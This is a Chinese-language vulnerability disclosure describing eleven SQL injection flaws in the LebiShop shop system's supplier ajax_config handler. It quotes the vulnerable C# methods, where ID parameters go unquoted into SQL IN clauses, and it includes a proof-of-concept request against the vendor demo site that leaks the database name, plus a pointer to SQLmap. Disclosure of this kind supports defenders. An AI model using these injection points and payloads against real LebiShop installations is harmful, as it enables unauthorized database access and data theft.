### 简要描述:
LebiShop商城系统最新版十一处SQL注入六
### 详细说明:
LebiShop商城系统最新版十一处SQL注入
这里也是需要有商家账号权限
首先注册普通用户账户,然后申请注册商家账户
申请商家用户是默认开发注册的
Shop.Supplier.Ajax.ajax_config文件
第一处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void Bank_Del()
{
if (!base.Power("supplier_bank_list", "收款账号"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("Fid");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_Supplier_Bank.Delete(string.Concat(new object[]
{
"id in (",
id,//注入产生
") and Supplier_id = ",
this.CurrentSupplier.id
}));
Log.Add("删除收款账号", "Bank", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第二处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void BillType_Del()
{
if (!base.Power("supplier_billtype_list", "发票管理"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("Fid");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_Supplier_BillType.Delete(string.Concat(new object[]
{
"id in (",
id,//注入产生
") and Supplier_id = ",
this.CurrentSupplier.id
}));
Log.Add("删除发票类型", "BillType", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第三处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void indeximage_Del()
{
if (!EX_Admin.Power("indeximage_del", "删除店铺幻灯"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("ids");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_Page.Delete(string.Concat(new object[]
{
"id in (",
id,//注入产生
") and Supplier_id=",
this.CurrentSupplier.id
}));
Log.Add("删除店铺幻灯", "Page", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第四处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void Message_Del()
{
if (!base.Power("supplier_message", "站内信"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("ids");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_Message.Delete(string.Concat(new object[]
{
"Supplier_id=",
this.CurrentSupplier.id,
" and id in (",
id,//注入产生
")"
}));
Log.Add("删除站内信", "Message", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第五处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void ServicePanel_Del()
{
if (!base.Power("supplier_servicepanel_list", "客服面板"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("ids");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_ServicePanel.Delete(string.Concat(new object[]
{
"Supplier_id = ",
this.CurrentSupplier.id,
" and id in (",
id,//注入产生
")"
}));
Log.Add("删除客服成员", "ServicePanel", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第六处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void ServicePanel_Group_Del()
{
if (!base.Power("supplier_servicepanel_list", "客服面板"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("ids");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_ServicePanel_Group.Delete(string.Concat(new object[]
{
"Supplier_id = ",
this.CurrentSupplier.id,
" and id in (",
id,//注入产生
")"
}));
Log.Add("删除客服部门", "ServicePanel_Group", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第七处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void ServicePanel_Group_Update()
{
if (!base.Power("supplier_servicepanel_list", "客服面板"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("Uid");
List<Lebi_ServicePanel_Group> models = B_Lebi_ServicePanel_Group.GetList(string.Concat(new object[]
{
"Supplier_id = ",
this.CurrentSupplier.id,
" and id in (",
id,//注入产生
")"
}), "");
foreach (Lebi_ServicePanel_Group model in models)
{
model.Sort = RequestTool.RequestInt("Sort" + model.id, 0);
model.Name = RequestTool.RequestString("Name" + model.id);
B_Lebi_ServicePanel_Group.Update(model);
}
Log.Add("编辑客服部门", "ServicePanel_Group", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第八处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void ServicePanel_Update()
{
if (!base.Power("supplier_servicepanel_list", "客服面板"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("Uid");
List<Lebi_ServicePanel> models = B_Lebi_ServicePanel.GetList(string.Concat(new object[]
{
"Supplier_id = ",
this.CurrentSupplier.id,
" and id in (",
id,//注入产生
")"
}), "");
foreach (Lebi_ServicePanel model in models)
{
model.Sort = RequestTool.RequestInt("Sort" + model.id, 0);
model.Name = RequestTool.RequestString("Name" + model.id);
model.Account = RequestTool.RequestString("Account" + model.id);
B_Lebi_ServicePanel.Update(model);
}
Log.Add("编辑客服成员", "ServicePanel", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第九处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void Transport_Price_Del()
{
if (!base.Power("supplier_transport_list", "配送方式"))
{
base.AjaxNoPower();
return;
}
string id = RequestTool.RequestString("Fid");
if (id == "")
{
base.Response.Write("{\"msg\":\"" + base.Tag("请选择要删除的信息") + "\"}");
return;
}
B_Lebi_Transport_Price.Delete(string.Concat(new object[]
{
"id in (",
id,//注入产生
") and Supplier_id = ",
this.CurrentSupplier.id
}));
Log.Add("删除配送区域", "Transport_Price", id.ToString(), this.CurrentSupplier, id.ToString());
base.Response.Write("{\"msg\":\"OK\"}");
}
```
第十处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void Transport_Price_Edit()
{
......
else
{
string aids = RequestTool.RequestString("Area_ids");
if (aids == "")
{
aids = "0";
}
List<Lebi_Area> areas = B_Lebi_Area.GetList("id in (" + aids + ")", "");
```
参数aids在GetList方法中的in条件语句中产生注入
第十一处SQL注入
```
// Shop.Supplier.Ajax.ajax_config
public void Transport_Price_Update()
{
if (!base.Power("supplier_transport_list", "配送方式"))
{
base.AjaxNoPower();
return;
}
int tid = RequestTool.RequestInt("tid", 0);
string id = RequestTool.RequestString("Uid");
Lebi_Transport tmodel = B_Lebi_Transport.GetModel(tid);
List<Lebi_Transport_Price> models = B_Lebi_Transport_Price.GetList(string.Concat(new object[]
{
"id in (",
id,//注入产生
") and Transport_id=",
tid,
" and Supplier_id = ",
this.CurrentSupplier.id
}), "");
foreach (Lebi_Transport_Price model in models)
{
model.Price = RequestTool.GetFormDecimal("Price" + model.id, 0m);
model.Weight_Start = RequestTool.GetFormDecimal("Weight_Start" + model.id, 0m);
model.Weight_Step = RequestTool.GetFormDecimal("Weight_Step" + model.id, 0m);
model.Price_Step = RequestTool.GetFormDecimal("Price_Step" + model.id, 0m);
B_Lebi_Transport_Price.Update(model);
}
Log.Add("编辑配送区域", "Transport_Price", id.ToString(), this.CurrentSupplier, tmodel.Name);
base.Response.Write("{\"msg\":\"OK\"}");
}
```
上述SQL注入都是在通过RequestTool.RequestString方法获取参数值
这里只是进行了单引号的转义
然后参数值进入了数据库执行的in条件SQL语句
在in条件语句中没有单引号保护,导致RequestTool.RequestString的处理无效
导致恶意sql语句进入sql条件语句中,最终导致SQL注入产生
### 漏洞证明:
以第一处sql注入为例
官方demo演示
报出当前数据库信息
```
http://plus.demo.lebi.cn/supplier/ajax/ajax_config.aspx?__Action=Bank_Del&url=/
Fid=db_name()
```
[<img src="https://images.seebug.org/upload/201501/20172557b117b19d91e429abcaac2a5e47536666.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/20172557b117b19d91e429abcaac2a5e47536666.png)
使用SQLmap即可跑出数据
京公网安备 11010502034610号
暂无评论